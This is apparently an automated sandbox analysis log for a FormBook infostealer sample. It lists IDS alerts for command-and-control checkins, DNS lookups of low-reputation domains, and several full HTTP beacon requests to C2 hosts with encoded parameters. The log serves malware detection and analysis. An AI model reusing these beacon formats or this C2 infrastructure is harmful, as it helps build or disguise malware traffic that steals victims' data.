            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57369 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57370 -> 52.13.151.179:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57355 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:50009 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57375 -> 103.106.67.112:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57339 -> 103.224.182.242:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57354 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57327 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57336 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57372 -> 52.13.151.179:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57343 -> 209.74.64.187:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57363 -> 94.23.162.163:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57359 -> 8.210.49.139:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57353 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57356 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57357 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57352 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:57362 -> 8.210.49.139:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:57374 -> 103.106.67.112:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.sailforever.xyz
            Source: DNS query: www.launchdreamidea.xyz
            Source: DNS query: www.030002837.xyz
            Source: DNS query: www.booosted.xyz
            Source: Joe Sandbox ViewIP Address: 209.74.64.187 209.74.64.187
            Source: Joe Sandbox ViewIP Address: 65.21.196.90 65.21.196.90
            Source: Joe Sandbox ViewIP Address: 94.23.162.163 94.23.162.163
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: Joe Sandbox ViewASN Name: VOYAGERNET-AS-APVoyagerInternetLtdNZ VOYAGERNET-AS-APVoyagerInternetLtdNZ
            Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox ViewASN Name: CP-ASDE CP-ASDE
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownTCP traffic detected without corresponding DNS query: 217.70.184.50
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\BL.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 21 Oct 2024 15:26:38 GMTserver: Apacheset-cookie: __tad=1729524398.8660091; expires=Thu, 19-Oct-2034 15:26:38 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 21 Oct 2024 15:26:41 GMTserver: Apacheset-cookie: __tad=1729524401.7366602; expires=Thu, 19-Oct-2034 15:26:41 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Mon, 21 Oct 2024 15:26:43 GMTserver: Apacheset-cookie: __tad=1729524403.5845140; expires=Thu, 19-Oct-2034 15:26:43 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 c1 8e 9b 30 10 3d 87 af 18 b1 07 88 b6 0b 49 a3 b6 52 02 f4 50 a9 52 ab 1e aa dd f6 5c 39 66 08 4e c0 a6 f6 90 6c b4 ca bf 77 4c d8 ec b6 7b e8 72 49 6c bf 37 6f de 63 4c 56 53 db 14 41 56 a3 28 f9 87 14 35 58 6c d4 5e e9 8d 38 88 e3 fc ed 22 d1 48 59 7a 3e 08 32 27 ad ea 08 e8 d8 61 1e 12 de 53 ba 15 7b 71 de 0d c1 59 99 87 e9 d6 a5 15 f3 d1 76 56 69 4a 95 aa 30 69 95 4e b6 2e 2c b2 f4 8c fd 5f a9 22 d8 0b 0b 16 4b 65 51 d2 af 46 e9 1d e4 10 d5 44 dd 32 4d 0f 87 43 f2 a2 c9 74 be ed 65 fa 31 5a 05 41 9a c2 1d 12 08 20 d5 a2 e9 09 4c 05 8b d9 0c 5a 25 ad 71 28 8d 2e 1d 90 01 bc 47 d9 13 32 f0 51 09 54 05 54 23 3c 33 00 9d 35 ad 72 bc 27 54 e3 a0 32 16 9c 69 91 29 c2 19 1d 54 bd 96 a4 8c e6 e3 a6 59 0b b9 bb 1d 4b c5 53 78 08 26 07 a5 4b 73 48 1a 23 85 47 25 16 bb 46 48 8c ff b2 76 1d 55 5d 7e f3 21 9a ae 82 53 10 90 3d 7a 26 77 e9 08 6c 69 7f 8c 26 72 70 48 e3 22 fe 57 ed 8d 37 c8 fc 89 cf ad ea be 8f 3d e7 f0 f9 c9 c9 d7 3b ee 43 94 f1 43 6b b4 22 c3 5b 9b a5 6f db e1 c9 33 2f ac 60 32 49 38 04 1d 57 1d e4 05 57 4b 36 c8 76 a6 97 7d fe 33 b1 e8 fa 86 fc f9 03 f8 f5 28 6c 7d 9f de 4e 74 7d 46 24 7b e5 bc d8 97 72 35 c0 64 83 e2 d1 52 fc e4 6e 7a 3e 7d 5d 5c 5e 66 20 f8 be 4f c0 58 59 c7 68 ed 90 f8 cb f7 30 a4 fa 7c f2 e8 c8 c3 0c 6b 53 72 d0 e0 b1 1b 6b 7a 5d 2e af e6 b3 b9 5c bc 87 13 30 7a 00 31 6d bc 1a 03 7a bd 91 a6 31 36 0f af aa e1 09 c1 0f 2e 2f 67 c3 c3 63 9b 95 6a 0f 03 37 8f 4a e5 b8 fb e3 12 b4 d1 b8 8a 8a 4c 40 6d b1 ca 5f 33 c6 7e 20 16 51 f1 a9 51 72 07 35 5a 1c e6 55 13 da 2c 15 7c 8d 58 86 c5 b4 19 4d 65 2d 12 57 e7 ba 37 f8 bb 57 fb 3c 64 21 7e 01 75 08 3c 47 c4 c4 3c 9c ad e0 e7 ed b7 fc 95 e2 ef fc 65 bd d4 e7 1c 7c 00 43 1e fe 8b f1 07 e8 99 28 63 38 04 00 00 Data Ascii: T0=IRPR\9fNlwL{rIl7ocLVSAV(5Xl^8"HYz>2'aS{qYvViJ0iN.,_"KeQFD2MCte1ZA LZ%q(.G2QTT#<35r'T2i)TYKSx&KsH#G%FHvU]~!S=z&wli&rpH"W7=;CCk"[o3/`2I8WWK6v}3(l}Nt}F${r5dRnz>}]\^f OXYh0|kSrkz].\0z1mz16./gcj7JL@m_3~ QQr5ZU,|XMe-W7W<d!~u<G<e|C(c8
            Source: global trafficHTTP traffic detected: GET /qw71/?qFHlI=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxCl1maFN4do860hmE4XwK9H8rJm4CQQIXjRIUyqXGbNbQLu85qd4=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.itemsort.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t7t4/?qFHlI=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3Nku9by2NxiW/BugQGTFPqLFbx4j0WlxBm1BAsaWpX3N32KwZ2Ws=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.rudemyvague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /hshp/?qFHlI=MBiESr0hPmgVFuSDgT1s92jewHX1Ts8BjfLus90OagNghP1boqy5GATWCckP72R/Mt6dwrAbNlxqg3zWk6ZAO3Iq2rVhW9Xv/lG/d0ara89ybvpX3yverDE1fB9qSbysYNDcMdg=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.sailforever.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bd77/?DJ=uNx48jdPyvmhqtM0&qFHlI=qUcYNRi6MmsiGKriyom62ti4lIWHctjIcWj4n4RDTJ9SK0tIDWNU+4/fdEnUeQPlIjs5HOj1IjY+OoVWBoHC3UpiwTnXxeZhDJSRDe+gKqbpDrlYtFKzXKQkj7Y9H+PYGWNXRqA= HTTP/1.1Host: www.launchdreamidea.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t10u/?qFHlI=z2kOE6Hdw1U1MLXnqmWT9va9e3/8+PVtvvr0x5hWEi4SF2SHBGm8gNhzQPXfz38/DYz+lgbjU03/S4gao0rDvDpYIFnALopyeCE4e57jCdKl+SQ4LvrwwLBMyOkaQtLwrEg4wvg=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.mondayigboleague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0bvj/?DJ=uNx48jdPyvmhqtM0&qFHlI=JoV24jQMdS4/3i4B5lXW6wgXe871T9Ry+Ik40cffOJE8Oz5kZb+e/LE/tYolIRko14Bt2A58ujzBN0XKB7HYh+a9+td3GPcpjeWl06kCA+p4W4MdKq1Fwo+I6zMR0Ax5A/L5wR0= HTTP/1.1Host: www.stocksm.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /v2k8/?qFHlI=XThEFIcSG6Rk+ek4TZakmC+nJJjAEcvsg7f4UZ5pblIcrBlS4WXKUvIR0hCzISiZvqIQ3m6PzA/XmcrRxXtM/qngBj8ZZb4M/OowV3zWfgcOAFUEQlNa1pKq422xJxUSmdUbTzU=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.drevohome.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /1juc/?DJ=uNx48jdPyvmhqtM0&qFHlI=Sd7Ig8sUf85GUDOexfZI7d4fWBR1p2+PhIDwYHX4t/HDftDJcaAUS3ArkHQTdeUPxnR6CHdkZBdIayuX0k+D5s2z0t36TzSFHzX86cZDIkqxXLJMLfdGhV7qhxXK/cNpqGCzJ34= HTTP/1.1Host: www.givingaway123.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qxse/?qFHlI=rpts+huSPQ+pmLEcaktqX4OYLAiBGOxJ0LqkryefQtnAbXwhGMtouJAJNGxD75BBoIrDH5z7ykmTX7GRRg85K9GP26O7G/CGnyNUhwPTmghA/Wmfri1zUJzRsgXk3AqKswS13LU=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.jagdud.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /y045/?qFHlI=y1BC7gE5U9SjKVi4f+qVAHSx2lLKNXVMs/YJXs1dmV0xz4NUECnrQCoTHq2W+qQeH7vV4kPmjQT4fdprdSopZ2qqizp83SA4VvMOfKjYwWha+waZ/9hnzA5UcC/NzqTplHtuhYQ=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.030002837.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /m7sk/?qFHlI=A6wDktXN+q8LbGsGA20DfX120LfCO8nuN87t6JZMO+a4oYZs/QR9AXcn2q3DsDkOv2Hc7Sq51OH+WlLaKJC8xJPP/rIa82Zn+KkAGuf+vJpb06LBCpCcPbQ0IYrj4c+7eLludaI=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.ethetf.digitalAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /12c7/?qFHlI=rkKrlAe8PM32Rlyr4yibAxDw7KGKKMI9ljR3Eqrj5cYHYbO4IgL/vCafVq76xsIWOM1RYR4h1usN6t6rhgLqLWVeQHwe4Xrlx3fbLdvyLDYZde2riYRc/AFjVf5IhMWO0SHTC3s=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.booosted.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /0628/?qFHlI=udVPsZZaektnpNC9MvhveAugnKqjqPi3CgpOVGQRV3GxzahYZeT2u+nvI8XmYm2tQXkKvM1/LtgNko72s5T+FigCVrQtCrgnSlgUA2JT078+MxZtZD+kFHsD8UJb6CndygVk2Aw=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.djazdgc.tokyoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /9vwi/?qFHlI=nzAHAMVHTcHZef2dtsV+gZN2Jg+zshsJ+9OWn5ktx4T+L9EMDtm05+R8HUsMmhIjUd2KUuTNFTfuNiAYWk32clZoBW+L2SPWINxOvyiUavjXvOCviB5/F051x4xiH/bw0UeFq30=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.productanalytics.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qw71/?qFHlI=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxCl1maFN4do860hmE4XwK9H8rJm4CQQIXjRIUyqXGbNbQLu85qd4=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.itemsort.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /t7t4/?qFHlI=JME/FbwkkQiTLR8EmPe57WZ7VagZp8tJ+vLJvTOCgHppMKWbYWfaRFz4/PgkMvknA1YharU87nKdOM/7k7q3Nku9by2NxiW/BugQGTFPqLFbx4j0WlxBm1BAsaWpX3N32KwZ2Ws=&DJ=uNx48jdPyvmhqtM0 HTTP/1.1Host: www.rudemyvague.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.itemsort.shop
            Source: global trafficDNS traffic detected: DNS query: www.rudemyvague.info
            Source: global trafficDNS traffic detected: DNS query: www.gws-treinamento2.shop
            Source: global trafficDNS traffic detected: DNS query: www.sailforever.xyz
            Source: global trafficDNS traffic detected: DNS query: www.launchdreamidea.xyz
